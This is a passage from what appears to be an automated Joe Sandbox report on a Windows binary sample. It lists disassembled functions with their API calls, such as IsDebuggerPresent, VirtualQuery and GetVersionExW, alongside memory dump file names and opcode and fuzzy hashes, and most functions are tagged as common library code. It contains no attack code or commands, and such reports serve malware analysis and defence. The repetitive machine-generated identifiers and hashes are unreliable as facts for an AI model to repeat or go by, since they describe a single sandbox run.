                                                                                                      • Part of subcall function 00E102BA: __EH_prolog.LIBCMT ref: 00E102BF
                                                                                                      • Part of subcall function 00E11B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E0BAE9,00000000,?,?,?,00010420), ref: 00E11BA0
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E02F91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                    • String ID: CMT
                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                    • Opcode ID: 111d6310f0c581f8abdf0771ba21e26e1992427b94248fe5398ae53beee7b4b1
                                                                                                    • Instruction ID: 15e8d2fecc3e1e1067d4ddd28fb0b793e9a6cd142f5e47b11fd8915a5380ffbf
                                                                                                    • Opcode Fuzzy Hash: 111d6310f0c581f8abdf0771ba21e26e1992427b94248fe5398ae53beee7b4b1
                                                                                                    • Instruction Fuzzy Hash: 386225716002448FDB19DF34C88A6EA3BE1EF54304F18557EED9AAB2C2DB7599C5CB20
                                                                                                    Function 00E1E6A3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(80000000,,0000001C,00E1E7DD,00000000,?,?,?,?,?,?,?,00E1E5E8,00000004,00E61CEC,00E1E86D), ref: 00E1E6B4
                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E1E5E8,00000004,00E61CEC,00E1E86D), ref: 00E1E6CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                    • String ID: D$
                                                                                                    • API String ID: 401686933-250975860
                                                                                                    • Opcode ID: 524e1766fdb506fcd02d5130fff078f3e03003d03e1f914186be9f05ef4eed9a
                                                                                                    • Instruction ID: ca3e9a7354925f68a956f82ebef5be5454a09a6eba3bb98053d6a90ba0309e16
                                                                                                    • Opcode Fuzzy Hash: 524e1766fdb506fcd02d5130fff078f3e03003d03e1f914186be9f05ef4eed9a
                                                                                                    • Instruction Fuzzy Hash: 2501F7326001096BDB14DE29DC09BED7BAAAFC4328F0CC121FD19E7250D738D9458680
                                                                                                    Function 00E1F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E1F844
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00E1F910
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E1F930
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00E1F93A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 254469556-0
                                                                                                    • Opcode ID: d663734b86c134a9f40a1b1c55ba3f9ce223303f5b257fcdb12769bd22f7f6ac
                                                                                                    • Instruction ID: e284f69ff286bd98b08f3228958cb7d13aaee94b56f4c13b8b86b5ed1b7d0d89
                                                                                                    • Opcode Fuzzy Hash: d663734b86c134a9f40a1b1c55ba3f9ce223303f5b257fcdb12769bd22f7f6ac
                                                                                                    • Instruction Fuzzy Hash: 173107B5D0521D9BDB20DFA4D989BCCBBB8AF08304F1040AAE40DAB250EB759A858F44
                                                                                                    Function 00E28EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E28FB5
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E28FBF
                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00E28FCC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: 40416f8d0eaa80f632425de81445789b788f7b247c86f1b8b70fdaba6853c214
                                                                                                    • Instruction ID: 477dd34d66a0d0b3baebd4f69e92fd7d2fc1b8605b3b5acec29f4759c9d387f8
                                                                                                    • Opcode Fuzzy Hash: 40416f8d0eaa80f632425de81445789b788f7b247c86f1b8b70fdaba6853c214
                                                                                                    • Instruction Fuzzy Hash: E931B77590122C9BCB21DF65DD89BDDBBB4AF08310F5052EAE41CA6250EB709F858F44
                                                                                                    Function 00E2D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                    • Instruction ID: 960b42b3cf75e468cd1a4443b7b2a9b4f553b413aa64fb6b77ecec49b483d33a
                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                    • Instruction Fuzzy Hash: 48022C71E042299FDF18CFA9D9806ADB7F1EF48314F25916AE919F7380D730AA41CB90
                                                                                                    Function 00E1AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00E1AF35
                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,00E3E72C,?,?), ref: 00E1AF84
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                    • String ID:
                                                                                                    • API String ID: 2169056816-0
                                                                                                    • Opcode ID: a748e8a2080aac90c8f110eec26ac844d4593de930a02512fb066cd5f53a71b5
                                                                                                    • Instruction ID: a7de146f8a6c4a210651ae19c96732c1bc191194dca05f1b74ce5f03e05d7836
                                                                                                    • Opcode Fuzzy Hash: a748e8a2080aac90c8f110eec26ac844d4593de930a02512fb066cd5f53a71b5
                                                                                                    • Instruction Fuzzy Hash: 4501217A200308AED7109F75DC49F9A7BBCEF49711F505422FA05F7290D3709969CBA5
                                                                                                    Function 00E06C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00E06DDF,00000000,00000400), ref: 00E06C74
                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E06C95
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 3479602957-0
                                                                                                    • Opcode ID: 866ed21b9822de925d0e392bab60ad585d2f718d8c60643a500cd76ffc1d06fb
                                                                                                    • Instruction ID: 91b95aa4e5fefa1ad580f5cdb11d2994d6e38d506b7f76c417ff1e6e040c1a78
                                                                                                    • Opcode Fuzzy Hash: 866ed21b9822de925d0e392bab60ad585d2f718d8c60643a500cd76ffc1d06fb
                                                                                                    • Instruction Fuzzy Hash: A8D0A730344300BFFA040B324D4AF1A7F99BF40B45F14C0047340F40E0C6748464AA14
                                                                                                    Function 00E319F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E319EF,?,?,00000008,?,?,00E3168F,00000000), ref: 00E31C21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: fa4ff86cf443ffbeb5b7651afe294e42ea6f77774b1cc904c30f3f5640f24de9
                                                                                                    • Instruction ID: 9b29ff9cd2bbdf6d7f256cb662c5a282b943be52108faca47fe493aa94eac794
                                                                                                    • Opcode Fuzzy Hash: fa4ff86cf443ffbeb5b7651afe294e42ea6f77774b1cc904c30f3f5640f24de9
                                                                                                    • Instruction Fuzzy Hash: B9B10731610608DFD719CF28C48ABA5BFA0FF45369F29969CE899DF2A1C335D991CB40
                                                                                                    Function 00E1F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E1F66A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 2325560087-0
                                                                                                    • Opcode ID: 5faeed5dc6ec84dba653dfa0df11ab5ec2ba6161d7ef84a1925520fec9c5cb50
                                                                                                    • Instruction ID: f0164f41ab536511c95c075f590f954b391377cc88e532022ce022c0a3e03ec3
                                                                                                    • Opcode Fuzzy Hash: 5faeed5dc6ec84dba653dfa0df11ab5ec2ba6161d7ef84a1925520fec9c5cb50
                                                                                                    • Instruction Fuzzy Hash: FE51AFB19106098FEB29CF59E8857EABBF0FB48358F24947AD411FB390D3749944CB90
                                                                                                    Function 00E0B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00E0B16B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: b6e720d9b8d41b34b2bfef87198ef6567db7ce1f410f642ca77a9ff22794306e
                                                                                                    • Instruction ID: 7e879775c086908fb94dc41ab758ad8298cad068b11e4bdeeac0953563c3eed5
                                                                                                    • Opcode Fuzzy Hash: b6e720d9b8d41b34b2bfef87198ef6567db7ce1f410f642ca77a9ff22794306e
                                                                                                    • Instruction Fuzzy Hash: 7BF03AB8E002088FDB28CB29ED966D977F1FB99359F104295D515B37D0C3B0ADC98E60
                                                                                                    Function 00E040FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 0-4203073231
                                                                                                    • Opcode ID: 3b568b95a2d4a151c7cf4db419d32fc3a6a4174e4e5f0ab58934fd068e8628f2
                                                                                                    • Instruction ID: 72f275e9aee27a5cacbf554541631c8bec4d85547c1c39e9fab4db70b31269e1
                                                                                                    • Opcode Fuzzy Hash: 3b568b95a2d4a151c7cf4db419d32fc3a6a4174e4e5f0ab58934fd068e8628f2
                                                                                                    • Instruction Fuzzy Hash: 73C149729183418FC354CF29D880A5AFBE2BFC8308F15892EE998D7311D734E945CB96
                                                                                                    Function 00E1F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00E1F3A5), ref: 00E1F9DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
